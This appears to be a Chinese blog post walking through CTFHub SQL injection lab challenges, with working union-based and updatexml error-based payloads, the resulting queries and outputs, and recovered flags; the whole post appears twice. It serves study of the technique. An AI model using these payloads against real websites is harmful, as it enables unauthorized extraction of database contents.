今天在ctfhub整理了幾個sql注入的解題過程,還算是比較詳細的。
最近開通了博客園,i了現在用着的一款模板:本題博客園連接。
https://www.cnblogs.com/h3zh1/p/12556286.html
知識點都是比較常見的:每個題大致涉及的知識點用一張表格解釋
!注:下方的 information_schema.xxxxxxxxxxxxxx皆表示 information_schema庫下的表
如:schemata、tables等,不作特殊說明的都指information庫下的數據表
還有此處的題是ctfhub整合好的,所以所有的數據庫和表包括字段名都一樣,不要偷懶。
關鍵字/語句/函數 | 解釋 |
---|---|
union select | 聯合查詢,聯合注入常用 |
database() | 回顯當前連接的數據庫 |
version() | 查看當前sql的版本如:mysql 1.2.3, mariadb-4.5.6 |
group_concat() | 把產生的同一分組中的值用,連接,形成一個字符串 |
information_schema | 存了很多mysql信息的數據庫 |
information_schema.schemata | information_schema庫的一個表,名爲schemata |
schema_name | schemata表中存儲mysql所有數據庫名字的字段 |
information_schema.tables | 存了mysql所有的表 |
table_schema | tables表中存每個表對應的數據庫名的字段 |
table_name | 表的名字和table_schema一一對應 |
information_schema.columns | columns表存了所有的列的信息4 |
column_name | 當你知道一個表的名字時,可通過次字段獲得表中的所有字段名(列名) |
table_name | 表的名字和column_name一一對應 |
select updatexml(1,concat(0x7e,database(),0x7e),1); | 這裏注意,只在databse()處改你想要的內容即可報錯回顯 |
right(str, num) | 字符串從右開始截取num個字符 |
left(str,num) | 同理:字符串從左開始截取num個字符 |
substr(str,N,M) | 字符串,從第N個字符開始,截取M個字符 |
1.SQL整數型注入
- 爆當前數據庫
4 union select 3,database()
select * from news where id=4 union select 3,database()
ID: 3
Data: sqli
-
根據information_schema.schemata爆所有的數據庫
4 union select 3,group_concat(schema_name) from information_schema.schemata
select * from news where id=4 union select 3,group_concat(schema_name) from information_schema.schemata
ID: 3
Data: information_schema,mysql,performance_schema,sqli
- 根據 information_schema.tables 和 已知的數據庫名sqli爆表名
4 union select 3,group_concat(table_name) from information_schema.tables where table_schema="sqli"
select * from news where id=4 union select 3,group_concat(table_name) from information_schema.tables where table_schema="sqli"
ID: 3
Data: news,flag
-
知道了flag表,就去爆爆字段根據 information_schema.columns 和 flag 表名
4 union select 3,group_concat(column_name) from information_schema.columns where table_name="flag"
select * from news where id=4 union select 3,group_concat(column_name) from information_schema.columns where table_name="flag"
ID: 3
Data: flag
5.知道了flag字段就好說了,直接查裏面的內容吧
4 union select 3,group_concat(flag) from sqli.flag
select * from news where id=4 union select 3,group_concat(flag) from sqli.flag
ID: 3
Data: ctfhub{cf0c7df79d5f387aca776784bb5cfaebf98980f0}
#2.SQL 字符型注入
- 爆列數,不過也不用爆了,因爲回顯就兩列 :ID、DATA
3' union select database(),version() #
-
爆庫名
3' union select database(),group_concat(schema_name) from information_schema.schemata #
回顯:數據庫名字sqli
select * from news where id='3' union select database(),group_concat(schema_name) from information_schema.schemata #'
ID: sqli
Data: information_schema,performance_schema,mysql,sqli -
爆列名
3' union select database(),group_concat(table_name) from information_schema.tables where table_schema='sqli' #
回顯表名:flag
select * from news where id='3' union select database(),group_concat(table_name) from information_schema.tables where table_schema='sqli' #
ID: sqli
Data: news,flag -
爆字段名
3' union select database(),group_concat(column_name) from information_schema.columns where table_name='flag' #
回顯字段名:flag
select * from news where id=‘3’ union select database(),group_concat(column_name) from information_schema.columns where table_name=‘flag’ #’
ID: sqli
Data: flag -
爆字段名
3' union select database(),group_concat(flag) from sqli.flag #'
select * from news where id='' union select database(),group_concat(flag) from sqli.flag #'
ID: sqli
Data: ctfhub{4f0e4923b55e73aa9a1a5fd66fb88b13a1e9e7f2}
#3.SQL報錯注入
- 爆當前數據庫
1 union select updatexml(1,concat(0x7e,database(),0x7e),1); #
-
爆所有數據庫,注意要用括號包起來那一行
1 union select updatexml(1,concat(0x7e, (select(group_concat(schema_name))from information_schema.schemata) ,0x7e),1); #
回顯所有數據庫的部分,發現沒有回顯sqli的名字,所以肯定是回顯的長度受限,之前用到過,substr,left ,mid ,和right函數
select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(schema_name))from information_schema.schemata) ,0x7e),1); #
查詢錯誤: XPATH syntax error: ‘~information_schema,mysql,perfor’
注意回顯得字符最大長度:32個
-
爆右邊的31個字符,發現了重疊,
1 union select updatexml(1,concat(0x7e,right( (select(group_concat(schema_name))from information_schema.schemata) ,31 ),0x7e),1); #
select * from news where id=1 union select updatexml(1,concat(0x7e, right((select(group_concat(schema_name))from information_schema.schemata) ,31) ,0x7e),1); #
查詢錯誤: XPATH syntax error: ‘~a,mysql,performance_schema,sqli’所以總共:information_schema,mysql,performance_schema,sqli四個數據庫
-
爆表
1 union select updatexml(1,concat(0x7e,
(select(group_concat(table_name))from information_schema.tables where table_schema="sqli")
,0x7e),1); #
select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(table_name))from information_schema.tables where table_schema="sqli") ,0x7e),1); #
查詢錯誤: XPATH syntax error: ‘news,flag’
- 爆列名
1 union select updatexml(1,concat(0x7e, (select(group_concat(column_name))from information_schema.columns where table_name="flag") ,0x7e),1); #
select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(column_name))from information_schema.columns where table_name="flag") ,0x7e),1); #
查詢錯誤: XPATH syntax error: ‘flag’
- 爆內容
一部分flag:
1 union select updatexml(1,concat(0x7e, (select(group_concat(flag)) from sqli.flag) ,0x7e),1); #
select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(flag)) from sqli.flag) ,0x7e),1); #
查詢錯誤: XPATH syntax error: ‘~ctfhub{2333ee20c980f72952ce65c4’
另一部分flag:
1 union select updatexml(1,concat(0x7e, right((select(group_concat(flag)) from sqli.flag) ,31),0x7e),1); #
select * from news where id=1 union select updatexml(1,concat(0x7e, right((select(group_concat(flag)) from sqli.flag) ,31),0x7e),1); #
查詢錯誤: XPATH syntax error: ‘~80f72952ce65c494ec82b147e9940d}’拼接flag:ctfhub{2333ee20c980f72952ce65c494ec82b147e9940d}
今天在ctfhub整理了幾個sql注入的解題過程,還算是比較詳細的。
知識點都是比較常見的:每個題大致涉及的知識點用一張表格解釋
!注:下方的 information_schema.xxxxxxxxxxxxxx皆表示 information_schema庫下的表
如:schemata、tables等,不作特殊說明的都指information庫下的數據表
還有此處的題是ctfhub整合好的,所以所有的數據庫和表包括字段名都一樣,不要偷懶。
關鍵字/語句/函數 | 解釋 |
---|---|
union select | 聯合查詢,聯合注入常用 |
database() | 回顯當前連接的數據庫 |
version() | 查看當前sql的版本如:mysql 1.2.3, mariadb-4.5.6 |
group_concat() | 把產生的同一分組中的值用,連接,形成一個字符串 |
information_schema | 存了很多mysql信息的數據庫 |
information_schema.schemata | information_schema庫的一個表,名爲schemata |
schema_name | schemata表中存儲mysql所有數據庫名字的字段 |
information_schema.tables | 存了mysql所有的表 |
table_schema | tables表中存每個表對應的數據庫名的字段 |
table_name | 表的名字和table_schema一一對應 |
information_schema.columns | columns表存了所有的列的信息4 |
column_name | 當你知道一個表的名字時,可通過次字段獲得表中的所有字段名(列名) |
table_name | 表的名字和column_name一一對應 |
select updatexml(1,concat(0x7e,database(),0x7e),1); | 這裏注意,只在databse()處改你想要的內容即可報錯回顯 |
right(str, num) | 字符串從右開始截取num個字符 |
left(str,num) | 同理:字符串從左開始截取num個字符 |
substr(str,N,M) | 字符串,從第N個字符開始,截取M個字符 |
1.SQL整數型注入
- 爆當前數據庫
4 union select 3,database()
select * from news where id=4 union select 3,database()
ID: 3
Data: sqli
-
根據information_schema.schemata爆所有的數據庫
4 union select 3,group_concat(schema_name) from information_schema.schemata
select * from news where id=4 union select 3,group_concat(schema_name) from information_schema.schemata
ID: 3
Data: information_schema,mysql,performance_schema,sqli
- 根據 information_schema.tables 和 已知的數據庫名sqli爆表名
4 union select 3,group_concat(table_name) from information_schema.tables where table_schema="sqli"
select * from news where id=4 union select 3,group_concat(table_name) from information_schema.tables where table_schema="sqli"
ID: 3
Data: news,flag
-
知道了flag表,就去爆爆字段根據 information_schema.columns 和 flag 表名
4 union select 3,group_concat(column_name) from information_schema.columns where table_name="flag"
select * from news where id=4 union select 3,group_concat(column_name) from information_schema.columns where table_name="flag"
ID: 3
Data: flag
5.知道了flag字段就好說了,直接查裏面的內容吧
4 union select 3,group_concat(flag) from sqli.flag
select * from news where id=4 union select 3,group_concat(flag) from sqli.flag
ID: 3
Data: ctfhub{cf0c7df79d5f387aca776784bb5cfaebf98980f0}
#2.SQL 字符型注入
- 爆列數,不過也不用爆了,因爲回顯就兩列 :ID、DATA
3' union select database(),version() #
-
爆庫名
3' union select database(),group_concat(schema_name) from information_schema.schemata #
回顯:數據庫名字sqli
select * from news where id='3' union select database(),group_concat(schema_name) from information_schema.schemata #'
ID: sqli
Data: information_schema,performance_schema,mysql,sqli -
爆列名
3' union select database(),group_concat(table_name) from information_schema.tables where table_schema='sqli' #
回顯表名:flag
select * from news where id='3' union select database(),group_concat(table_name) from information_schema.tables where table_schema='sqli' #
ID: sqli
Data: news,flag -
爆字段名
3' union select database(),group_concat(column_name) from information_schema.columns where table_name='flag' #
回顯字段名:flag
select * from news where id=‘3’ union select database(),group_concat(column_name) from information_schema.columns where table_name=‘flag’ #’
ID: sqli
Data: flag -
爆字段名
3' union select database(),group_concat(flag) from sqli.flag #'
select * from news where id='' union select database(),group_concat(flag) from sqli.flag #'
ID: sqli
Data: ctfhub{4f0e4923b55e73aa9a1a5fd66fb88b13a1e9e7f2}
#3.SQL報錯注入
- 爆當前數據庫
1 union select updatexml(1,concat(0x7e,database(),0x7e),1); #
-
爆所有數據庫,注意要用括號包起來那一行
1 union select updatexml(1,concat(0x7e, (select(group_concat(schema_name))from information_schema.schemata) ,0x7e),1); #
回顯所有數據庫的部分,發現沒有回顯sqli的名字,所以肯定是回顯的長度受限,之前用到過,substr,left ,mid ,和right函數
select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(schema_name))from information_schema.schemata) ,0x7e),1); #
查詢錯誤: XPATH syntax error: ‘~information_schema,mysql,perfor’
注意回顯得字符最大長度:32個
-
爆右邊的31個字符,發現了重疊,
1 union select updatexml(1,concat(0x7e,right( (select(group_concat(schema_name))from information_schema.schemata) ,31 ),0x7e),1); #
select * from news where id=1 union select updatexml(1,concat(0x7e, right((select(group_concat(schema_name))from information_schema.schemata) ,31) ,0x7e),1); #
查詢錯誤: XPATH syntax error: ‘~a,mysql,performance_schema,sqli’所以總共:information_schema,mysql,performance_schema,sqli四個數據庫
-
爆表
1 union select updatexml(1,concat(0x7e,
(select(group_concat(table_name))from information_schema.tables where table_schema="sqli")
,0x7e),1); #
select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(table_name))from information_schema.tables where table_schema="sqli") ,0x7e),1); #
查詢錯誤: XPATH syntax error: ‘news,flag’
- 爆列名
1 union select updatexml(1,concat(0x7e, (select(group_concat(column_name))from information_schema.columns where table_name="flag") ,0x7e),1); #
select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(column_name))from information_schema.columns where table_name="flag") ,0x7e),1); #
查詢錯誤: XPATH syntax error: ‘flag’
- 爆內容
一部分flag:
1 union select updatexml(1,concat(0x7e, (select(group_concat(flag)) from sqli.flag) ,0x7e),1); #
select * from news where id=1 union select updatexml(1,concat(0x7e, (select(group_concat(flag)) from sqli.flag) ,0x7e),1); #
查詢錯誤: XPATH syntax error: ‘~ctfhub{2333ee20c980f72952ce65c4’
另一部分flag:
1 union select updatexml(1,concat(0x7e, right((select(group_concat(flag)) from sqli.flag) ,31),0x7e),1); #
select * from news where id=1 union select updatexml(1,concat(0x7e, right((select(group_concat(flag)) from sqli.flag) ,31),0x7e),1); #
查詢錯誤: XPATH syntax error: ‘~80f72952ce65c494ec82b147e9940d}’拼接flag:ctfhub{2333ee20c980f72952ce65c494ec82b147e9940d}